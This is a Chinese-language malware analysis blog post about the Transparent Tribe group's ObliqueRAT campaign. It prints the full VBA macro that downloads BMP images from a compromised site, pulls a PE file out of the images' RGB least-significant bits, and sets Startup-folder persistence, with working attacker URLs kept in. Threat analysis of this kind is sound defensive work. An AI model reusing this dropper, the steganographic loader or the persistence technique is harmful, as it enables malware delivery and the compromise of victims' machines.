图片隐写术 - 透明部落通过BMP的RGB通道隐藏PE数据

透明部落通过BMP的RGB通道隐藏PE数据

报告和样本

《Transparent Tribe APT expands its Windows malware arsenal》

没什么技术分析,主要是描述战术和趋势

《ObliqueRAT returns with new campaign using hijacked websites》

有描述宏代码,以及RAT的更新

《ObliqueRAT: New RAT hits victims’ endpoints via malicious documents》

内容为ObliqueRAT分析,也可以看看

样本

theta.bmp

camela.bmp

merj.bmp

宏代码

DownloadBackground:下载图片
BackgroundStretch:读取BMP图片保存为xls
BackgroundSize:将字符串Letter(ASC)转为OrderByte(Byte)

'下载图片
Sub DownloadBackground(url As String, filePath As String)
    Dim WinHttpReq As Object, attempts As Integer
    attempts = 4
    On Error GoTo TryAgain

TryAgain:
    attempts = attempts - 1
    Err.Clear
    If attempts > 0 Then
        Set WinHttpReq = CreateObject(\"Microsoft.XMLHTTP\")
        WinHttpReq.Open \"GET\", url, False
        WinHttpReq.send

        If WinHttpReq.Status = 200 Then
            Set Themeream = CreateObject(\"ADODB.Stream\")
            Themeream.Open
            Themeream.Type = 1
            Themeream.Write WinHttpReq.responseBody
            Themeream.SaveToFile filePath, 1
            Themeream.Close
        End If
    End If
End Sub

'PE文件大小
Private Function BackgroundSize(ByVal ProtectString As String) As Byte()
    Dim Nibbles() As Byte
    Dim ProtectPos As Long
    Dim ProtectDigit As Long
    Dim CursorLen As Long
    Dim Numeris As Long

    ReDim Nibbles(Len(ProtectString) \\ 2)
    For ProtectPos = 1 To Len(ProtectString)
        ProtectDigit = InStr(\"0123456789ABCDEF\", _
                         UCase$(Mid$(ProtectString, ProtectPos, 1))) - 1
        If ProtectDigit >= 0 Then
            If CursorLen > UBound(Nibbles) Then
                ReDim Preserve Nibbles(UBound(Nibbles) + 4)
            End If
            Nibbles(CursorLen) = Nibbles(CursorLen) * &H10 + ProtectDigit
            Numeris = Numeris + 1
        End If
        If Numeris = 2 Or ProtectDigit < 0 Then
            If Numeris > 0 Then CursorLen = CursorLen + 1
            Numeris = 0
        End If
    Next
    If Numeris = 0 Then CursorLen = CursorLen - 1
    If CursorLen < 0 Then
        Nibbles = \"\"
    Else
        ReDim Preserve Nibbles(CursorLen)
    End If
    BackgroundSize = Nibbles
End Function

'从BMP文件中提取出数据(PE文件)
Sub BackgroundStretch(pth As String, ByVal drpexP As String)
On Error Resume Next
Dim byteArray() As Byte
Dim memoryAddress As Long
Dim zL As Long
zL = 0
Dim rL As Long
Dim arrayofWords
    Const ForReading = 1, ForWriting = 2, ForAppending = 8
    Dim antiTermite, antiantiTermite, oFS, BreathTake, Letter, i, ch, WayPave
    WayPave = pth
    Set oFS = CreateObject(\"Scripting.FileSystemObject\")
    Set antiTermite = oFS.OpenTextFile(WayPave, ForReading, True)
        i = 0
        ch = 0
        Letter = \"\"
        antiTermite.Read (10)
        BreathTake = Asc(antiTermite.Read(1))
        BreathTake = BreathTake + Asc(antiTermite.Read(1)) * 256
        BreathTake = BreathTake + Asc(antiTermite.Read(1)) * 65536
        BreathTake = BreathTake + Asc(antiTermite.Read(1)) * 16777216
        antiTermite.Read (BreathTake - 14)
        Do Until antiTermite.AtEndOfStream
            i = i + 1
            ch = ch Or ((Asc(antiTermite.Read(1)) And 1) * (2 ^ (8 - i)))
            If i = 8 Then
                Letter = Letter & Chr(ch)
                If ch = 0 Then
                    Exit Do
                Else
                    ch = 0
                    i = 0
                End If
            End If
        Loop
    antiTermite.Close
    Set antiTermite = Nothing
    Set oFS = Nothing

'获取提取数据的文件大小
Dim OrderByte() As Byte
OrderByte = BackgroundSize(Letter)

Const adSaveCreateNotExist = 1
Const adTypeBinary = 1
Const adTypeText = 2
Dim objStreamUTF8: Set objStreamUTF8 = CreateObject(\"ADODB.Stream\")
Dim objStreamUTF8NoBOM: Set objStreamUTF8NoBOM = CreateObject(\"ADODB.Stream\")
With objStreamUTF8
  .Charset = \"UTF-16\"
  .Open
  .WriteText OrderByte
  .Position = 0
  .Type = adTypeText
  .Position = 2
End With

With objStreamUTF8NoBOM
  .Type = adTypeBinary
  .Open
  objStreamUTF8.CopyTo objStreamUTF8NoBOM
  .SaveToFile drpexP, 2
End With

objStreamUTF8.Close
objStreamUTF8NoBOM.Close
End Sub

Sub BackgroundManager()
On Error Resume Next

    Dim tmpBmpP As String
    Dim tmpBmpP2 As String
    Dim tmpBmpP3 As String
	'下载“http://iiaonline.in/DefenceLogo/theta.bmp”到“C:\\ProgramData\\SashaGreyHD.bmp”
	'ED9DCC4393AF121FD177CC4669383BFD
    tmpBmpP = \"C:\\ProgramData\\SashaGreyHD.bmp\"
    DownloadBackground \"http://iiaonline.in/DefenceLogo/theta.bmp\", tmpBmpP

    Dim fie, fie2, flh, flh2, enPd, Science As String
    Dim iotaD  As Variant
    Dim bcfe() As Byte
    Dim lnct As Double
    enPd = \"C:\\Users\\Public\\\"
    iotaD = enPd & \"555\\\"
    fie = \"chmodes\"
    flh = iotaD & fie & \".xlsx\"
    flh2 = iotaD & fie & \".pif\"
    Science = Environ$(\"userprofile\") & \"\\AppData\\Roaming\\Microsoft\\Word\\..\\Windows\\Start Menu\\Programs\\Junk\\..\\Startup\\looper.jpeg\"
	'确保路径“C:\\Users\\Public\\555”存在
    If Dir(iotaD, vbDirectory) = \"\" Then
        MkDir (iotaD)
    End If

    lnct = 0
	'将“C:\\ProgramData\\SashaGreyHD.bmp”保存为“C:\\Users\\Public\\555\\chmodes.xlsx”
    BackgroundStretch tmpBmpP, flh
	'将“chmodes.xlsx”转码并重命名为“chmodes.pif”
    Name flh As flh2

	'下载“http://iiaonline.in/sasha.jpg”到“C:\\ProgramData\\SashaGreyHQ.jpg”
    tmpBmpP2 = \"C:\\ProgramData\\SashaGreyHQ.jpg\"
    DownloadBackground \"http://iiaonline.in/sasha.jpg\", tmpBmpP2
    tmpBmpP3 = \"C:\\ProgramData\\SashaGreyHQ2.jpg\"
	'将“SashaGreyHQ.jpg”重命名为“SashaGreyHQ2.jpg”
    Name tmpBmpP2 As tmpBmpP3
    
    Dim oVaccine As Object
    Dim Theme As Object
    Set oVaccine = CreateObject(\"WScript.Shell\")
	'创建快捷方式“%userprofile%\\AppData\\Roaming\\Microsoft\\Word\\..\\Windows\\Start Menu\\Programs\\Junk\\..\\Startup\\looper.url\”
    Set Theme = oVaccine.CreateShortcut(Replace(Science, \"jpeg\", \"url\"))
	'快捷方式的运行路径为“C:\\Users\\Public\\555\\chmodes.pif”
    With Theme
        .TargetPath = flh2
        .Save
    End With
	'下载“http://iiaonline.in/timon.jpeg”到“C:\\ProgramData\\SashaGreyHQ.jpg”
    DownloadBackground \"http://iiaonline.in/timon.jpeg\", tmpBmpP2
End Sub
上一篇:Access vba实例


下一篇:MLP Attention实现